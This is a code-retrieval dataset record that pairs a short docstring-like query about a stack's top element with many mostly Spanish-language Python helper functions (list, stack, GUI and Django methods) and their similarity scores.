self.tablaSincronizaciones.indexAt(button.pos()).row()\n contenido = self.tablaSincronizaciones.item(row, 0).text()\n Archivo_crontab.eliminar_sincronizacion(contenido)\n self.tablaSincronizaciones.removeRow(row)", "def _primerElem(l):\n return l[0]", "def cargarObra(self):\n rowActual=self.tableObra.currentItem().row()\n self.lineObra.setText(str(self.tableObra.item(rowActual,0).text()))\n self.lineCuit.setText(str(self.tableObra.item(rowActual,1).text()))\n self.tableObra.hide()\n self.lineObra.setEnabled(False)\n self.lineCuit.setEnabled(False)\n self.obraSocialSeleccionada = 
str(self.lineObra.text())\n self.cargar_productos(self.obraSocialSeleccionada)\n self.gbProducto.setVisible(True)", "def cliquer_sur_unité(self):", "def afficher(dico):\n return dico", "def eliminar(self):\n\n itemActual = self.tablePagos.currentItem()\n if itemActual == None:\n self.showMsjEstado(\"Debe seleccionar un para poder eliminar\")\n else:\n monto = self.detalles_cobro[itemActual.row()][1]\n del self.detalles_cobro[itemActual.row()]\n self.total_a_pagar += monto\n self.tablePagos.setRowHidden(itemActual.row(),True)\n self.actualizar_total()", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def usunPrzedmiot(self, przedmiot: str):\n self.przedmioty.pop(przedmiot,0) # jesli ze slownika to dodaje popa aby pokazac mu co usunac", "def marcarPunto(self):\n # Es primera vez que marco\n if self.tempSelected == None:\n # Capturo el ultimo elemento se se selecciono\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")\n else:\n # Desmarco el anterior\n self.telaMAPA.itemconfigure(self.tempSelected, fill=\"white\")\n # Marco el nuevo\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")", "def remove_diluciju(self, naziv):\n self.dilucijskeJedinice.pop(naziv, 0)", "def Imagenes_del_ahorcado(intento):\n HANGMANPICS = ['''\n +---+\n | |\n |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\n os.system(\"clear\")\n print(HANGMANPICS[intento])", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def nuevo(self, ventana):\n self.objeto = ventana.objeto\n self.set_text(self.objeto.__str__())\n self.id = self.objeto.id\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n ventana.destroy()\n self.busqueda.destroy()", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = membre.tenu\n membre.tenu = None", "def get_ostale_kanale(self, x):\n out = self.sviKanali\n out.remove(x)\n return out", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def remove(self):", "def mezclar_bolsa(self):", "def retireSommet(self, sommet):\r\n nouveauGraphe = copy.deepcopy(self) # on effectue une copie du graphe\r\n nouveauGraphe.n = self.n-1 # On a n-1 points\r\n # NB: il faut aussi changer m et listeArretes mais on va pas le faire tout de suite car pas urgent\r\n # 1. On suprrime la ligne d'indice sommet\r\n #* AUTRE MÉTHODE del nouveauGraphe.adjMatrix[sommet]\r\n # print(nouveauGraphe.adjMatrix)\r\n nouveauGraphe.adjMatrix.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n #2. 
On supprime la colonne d'indice sommet = on supprime l'index sommet de chaque sous liste\r\n # la liste comprehension ne marche pas bien :(\r\n for line in nouveauGraphe.adjMatrix:\r\n line.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n # nouveauGraphe.m = 0\r\n # 2ème méthode:\r\n # for ligne in nouveauGraphe.adjMatrix:\r\n # ligne.pop(sommet)\r\n return nouveauGraphe", "def remove():", "def __init__(self, id, padre, hijos):\n\n self.__id = id\n self.__padre = padre\n self.__hijos = np.array([])\n for i in range(len(hijos)):\n newHijos = np.delete(hijos,i,0)#Se remueve el nodo de la lista una vez recorrido\n self.__hijos = np.append(self.__hijos, NodoCiudad(hijos[i],self,newHijos))", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def remove_uredjaj(self, naziv):\n self.uredjaji.pop(naziv, 0)", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def on_btnLista_clicked(self,guardar):\n XerarInformes()", "def cerrar(self):\n assert self.open == True\n # convierto a numpy\n self.ne = np.array(self.ne, dtype=int)\n self.je = np.array(self.je, dtype=int)\n # calculo el ie (apunta a donde comienza cada elem0 en je)\n self.ie = np.zeros(self.num+1, dtype=int) # necesito tener num+1 porque el ultimo elem0 termina donde comenzaria un elem0 extra inexistente en num+1\n self.ie[self.num] = self.len_je # ultimo indice (len=instance.num+1, pero como es base-0, el ultimo tiene indice instance.num)\n for i0 in range(self.num-1, -1, -1): # recorro desde el ultimo elem0 (indice num-1) hasta el primer elem0 (indice 0)\n self.ie[i0] = self.ie[i0+1] - self.ne[i0] # para saber donde empieza cada elem0 voy restando el numero de elem1 de cada uno\n self.open = False", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def remove(self, z):\n if (z.getEsquerdo() is None) or (z.getDireito() is None):\n y = z\n else:\n y = self.sucessor(z)\n if y.getEsquerdo() is not None:\n x = y.getDireito()\n else:\n x = y.getDireito()\n if x is not None:\n x.setPai(y.getPai())\n if y.getPai() is None:\n self.setRaiz(x)\n else:\n if y == y.getPai().getEsquerdo():\n y.getPai().setEsquerdo(x)\n else:\n y.getPai().setDireito(x)\n\n if y != z:\n z.setChave(y.getChave())\n return y", "def reemplaza_tildes(palabra):", "def cancella_ultimi(request, legahash, astaid, Oggetto, numero=0):\n ultimi = ottieni_ultimi(astaid, Oggetto, numero)\n context = {'lista': ultimi}\n #ultimi.delete()\n for x in ultimi:\n\t x.delete()\n return HttpResponse(\"Cancellato/i!\")", "def compactar(memoria):\n\n encontrado = False\n partAux = [0, None]\n nuevoEsp = 0\n\n for part in memoria[:]:\n if part[1] == None:\n encontrado = True\n nuevoEsp += part[0]\n del memoria[memoria.index(part)]\n\n if encontrado:\n partAux[0] = nuevoEsp\n memoria.append(partAux)\n\n return memoria", "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def Devolver_estado(self,estado:list) -> None:\n\t\tfor i in range(6):\n\t\t\tfor j in range(6):\n\t\t\t\t#Usamos deepcopy para que el minimax o el alfabeta realice cambios en copias y no en el tablero\n\t\t\t\tself.tablero[i][j]=copy.deepcopy(estado[i][j])", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = 
self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def dodajPrzedmiot(self, przedmiot: Przedmiot):\n self.przedmioty[przedmiot.nazwa]=przedmiot", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def eliminar(self, producto):\n\n producto_id = str(producto)\n\n if producto_id in self.carro:\n del self.carro[producto_id]\n self.guardar()", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 3d.. 
subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def __init__(self, id, n):\n\n hijos = np.delete(np.arange(n),id,0)#Se remueve el nodo de la lista una vez recorrido\n self.__raiz = NodoCiudad(id,None,hijos)", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def uvozi_podatke(tabele):\n for t in tabele:\n t.uvozi()", "def loeschen(self):\r\n loeschen=self.REQUEST['loeschen']\r\n tit=''\r\n i=0\r\n j=0\r\n index=[]\r\n cursor=[]\r\n for x in self.objectValues('Image'):\r\n if str(x.id())[0:6] not in index:\r\n index.append(str(x.id())[0:6]) \r\n cursor.append([str(x.id())[0:6],str(x.title),[str(x.id())]])\r\n if str(x.id())[0:6]==loeschen:\r\n tit=str(x.title)\r\n j=i\r\n i=i+1\r\n else:\r\n cursor[-1][2].append(str(x.id()))\r\n #for val in cursor[j][2]:\r\n #self._delOb(self, id=str(val))\r\n #delet=delet+str(val)+' '\r\n self.manage_delObjects(ids=cursor[j][2])\r\n return tit+' gel&ouml;scht !'", "def modoEliminarPuntos(self):\n self.option = 2\n self.btnADDpunto['bg'] = \"white\"\n self.btnEliminarPunto['bg'] = \"red\"\n self.btnModificarPunto['bg'] = \"white\"", "def revise():", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy 
z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def cima(pila):\n return pila.datos[pila.tope]", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def tomar_bolsa(self):\n return self.bolsa.pop()", "def cargarProductosSinObra(self):\n\n self.limpiarTabla(self.tableProductos)\n\n ##Cnsulta para obtener todos los productos del sistema, con su correspondiente\n ##codigo de barra, monodroga, descuento, importe\n query=self.sesion.query(ProductoModel.codigo_barra,ProductoModel.id_medicamento,ProductoModel.id_presentacion,MonodrogaModel.nombre,ProductoModel.importe).\\\n join(MedicamentoModel).filter(ProductoModel.id_medicamento==MedicamentoModel.nombre_comercial).\\\n join(MonodrogaModel).filter(MedicamentoModel.id_monodroga==MonodrogaModel.nombre).\\\n filter(ProductoModel.baja==False).order_by(ProductoModel.codigo_barra)\n\n ##Se cargan los datos obtenidos en la tabla de Producto\n for n, obj in enumerate(query):\n self.tableProductos.insertRow(n)\n self.tableProductos.setItem(n, 0, QtGui.QTableWidgetItem(str(obj[0])))\n self.tableProductos.setItem(n, 1, QtGui.QTableWidgetItem(str(obj[1])))\n self.tableProductos.setItem(n, 2, QtGui.QTableWidgetItem(str(obj[2])))\n self.tableProductos.setItem(n, 3, QtGui.QTableWidgetItem(str(obj[3])))\n self.tableProductos.setItem(n, 4, QtGui.QTableWidgetItem(str(0)))\n self.tableProductos.setItem(n, 5, QtGui.QTableWidgetItem(str(obj[4])))\n\n ##Se carga la cantidad de cada producto en la tabla\n for row,producto in enumerate(ProductoModel.buscarTodos(ProductoModel.codigo_barra,self.sesion)):\n self.tableProductos.setItem(row,6,QtGui.QTableWidgetItem(str(producto.getCantidad(self.sesion))))", "def agregar_bolsa(self, letra, cantidad):", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def actualizarLBI(produ,datInv,cant): # Esta sección fue hecha por Valeria \n datInv[produ][2] -= cant\n return datInv", "def clear_elements(self):\n\n pass", "def remove_element(self, element=None):\n pass", "def remove(self, elem):\n if self.inicio == None:\n raise ValueError(\"{} nao esta na lista\".format(elem))\n elif self.inicio.dado == elem:\n self.inicio = self.inicio.prox\n self._size = self._size - 1\n return True\n else:\n ancestor = self.inicio\n ponteiro = self.inicio.prox\n while ponteiro:\n if ponteiro.dado == elem:\n ancestor.prox = ponteiro.prox\n ponteiro.prox = None\n 
ancestor = ponteiro\n ponteiro = ponteiro.prox\n self._size = self._size - 1\n return True\n raise ValueError(\"{} nao esta na lista\".format(elem))", "def atender(self):\n\n if self.enfila>0:\n \n self.enfila-=1\n self.fila.pop(0)", "def test_f_eliminar_atributo(self):\n print '+++ Eliminacion de proyecto existente +++'\n borrar_request = self._eliminar_atributo(nombre)\n print '*-- datos de prueba ::: nombre = ' + str(nombre) +' --*'\n self.assertNotIn('Debe loguearse primeramente!!!!', borrar_request.data, 'No se ha logueado correctamente')\n self.assertNotIn('No posee los permisos suficientes para realizar la operacion', borrar_request.data, 'No tiene permisos para eliminar atributos')\n self.assertIn('El atributo ha sido eliminado con exito', borrar_request.data, 'Atributo no existe el nombre atributo')\n self.assertNotIn(str(nombre), borrar_request.data, 'El atributo no ha sido borrado')\n print '*-- Verificacion completa, se elimino correctamente--*'\n print '*---test 6 atributo---*'\n print '##----++++ FIN PRUEBA UNITARIA atributo ++++----##'", "def elems(self):", "def nouvellePartie(self):\n for i in range(0, 3):\n for j in range(0, 3):\n self.partie.uplateau[i, j].initialiser()\n self.canvas_uplateau[i, j].delete('pion')\n self.afficher_message(\" Nouvelle Partie\")", "def ustal_kon(self, f):\n kon= Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def borrar_primero(self):\t\t\n\t\tif self.len == 0:\n\t\t\traise ValueError(\"Lista vacia\")\n\t\tdato = self.prim.dato\n\t\tself.prim = self.prim.prox\n\t\tself.len -= 1\n\t\treturn dato", "def buscarObra(self):\n razon_social = str(self.lineObra.text())\n cuit = str(self.lineCuit.text())\n data = self.getAllTabla(self.tableObra)\n\n if razon_social != \"\":\n dataRazon = filter(lambda x: x[0].upper() == razon_social.upper(), data.values())\n else:\n dataRazon = data.values()\n if cuit != \"\":\n dataCuit = filter(lambda x: x[1].upper() == cuit.upper(), dataRazon)\n else:\n dataCuit = dataRazon\n\n for dato in data:\n self.tableObra.setRowHidden(dato,False)\n\n for dato in data:\n if not data[dato] in dataCuit:\n self.tableObra.setRowHidden(dato,True)", "def remove_neighbor(self):\n self.fono -= 1", "def BorrarListas(self,evt):\n self.l_bal = []\n self.l_muestras = []\n self.l_vol = []\n self.l_den = []\n self.l_calidad = []\n self.idact = 0", "def uvozi(self, encoding=\"UTF-8\"):\n insert = self.stroskovno_mesto.dodajanje(stevilo=1)\n super().uvozi(encoding=encoding, 
insert=insert)", "def remove_cistiZrak(self, naziv):\n self.generatoriCistogZraka.pop(naziv, 0)", "def dessicate(self) -> None:\n self.vector = None", "def scraper_notizie(self, contenuto_articoli: list):\n tot_menzioni = []\n for articolo in contenuto_articoli:\n # estraggo qualsisasi frase che menziona il giocatore\n sel_regex = f\"[\\w ,;()'’-]+{self.name}[\\w ,;()'’-]+\"\n results = re.findall(sel_regex, articolo)\n\n for res in results:\n # rimuovo il caso in cui sia solo in un elenco, come ad inizio articoli su ATTACCO\n if not re.search(f\", {self.name},\", res):\n tot_menzioni.append(res)\n if len(tot_menzioni) > 0:\n self.news = \"• \" + \"<br>•\".join(tot_menzioni)", "def actualizar(self):\n if self.obraSocialSeleccionada!=None:\n self.cargar_productos(self.obraSocialSeleccionada)\n else:\n self.cargarProductosSinObra()", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = cellule_suivante # récupération de la sauvegarde", "def resetTree(self):\n for fila in self.verDatos.get_children():\n self.verDatos.delete(fila)", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def desplazamientox(tiempo,velocidad):\r\n #se realiza un operacion para encontrar el el desplzamiento horizaontal\r\n x=tiempo*velocidad\r\n #se regresa el valor de x\r\n return x", "def post_delete(self, *args, **kw):\n id_atributo = int(args[0])\n transaction.begin()\n attr = AtributosPorTipoItem.por_id(id_atributo)\n DBSession.delete(attr)\n transaction.commit()\n flash(\"Atributo Eliminado\")\n redirect(\"./\")", "def __init__(self):\n self.fondo = None", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale 
mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def usar(self, ventana):\n self.objeto = self.busqueda.objeto\n self.set_text(self.objeto.__str__())\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n self.busqueda.destroy()" ]
[ "0.61714435", "0.61389273", "0.6033699", "0.5995851", "0.5916466", "0.5895718", "0.58551925", "0.5754909", "0.5726794", "0.5719078", "0.5699067", "0.56908727", "0.5681546", "0.56783044", "0.5675249", "0.5675179", "0.56316787", "0.55975395", "0.55830395", "0.55497795", "0.5538994", "0.55239606", "0.55217326", "0.5504797", "0.5500727", "0.5465768", "0.5437616", "0.5422737", "0.54194456", "0.5393014", "0.5390354", "0.5378103", "0.53663665", "0.5356854", "0.53561014", "0.53553367", "0.53490216", "0.5348721", "0.53354317", "0.5330773", "0.53234017", "0.5313325", "0.53016996", "0.52847177", "0.52797073", "0.52740425", "0.52726316", "0.52700865", "0.5264751", "0.5246081", "0.52407616", "0.5240596", "0.52393734", "0.5216288", "0.52158284", "0.5214596", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5211453", "0.5211354", "0.5210339", "0.5200933", "0.5195834", "0.51815784", "0.51815784", "0.5173195", "0.5164552", "0.5163713", "0.51626354", "0.51593226", "0.515304", "0.51443315", "0.51338875", "0.51266843", "0.5122071", "0.5113498", "0.5112786", "0.5108598", "0.5106672", "0.5096284", "0.5087527", "0.50727236", "0.50710344", "0.50627387", "0.50603706", "0.5058854", "0.5058854", "0.5058854", "0.50492185", "0.5049063", "0.50489867", "0.504522", "0.50419617", "0.50384885", "0.5031573" ]
0.6247548
0
Returns the element at the top of the stack
def cima(pila):
    return pila.datos[pila.tope]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def getFactura(self): \n return self.caja", "def getFactura(self): \n return self.caja", "def Cima(self):\n if(self.Pila_Vacia()=='true'):\n return \"Pila Vacia\"\n else:\n return self.pila[self.puntero]", "def valor(self):\n try:\n objeto = self.objeto\n except AttributeError:\n objeto = None\n return objeto", "def marcarPunto(self):\n # Es primera vez que marco\n if self.tempSelected == None:\n # Capturo el ultimo elemento se se selecciono\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")\n else:\n # Desmarco el anterior\n self.telaMAPA.itemconfigure(self.tempSelected, fill=\"white\")\n # Marco el nuevo\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 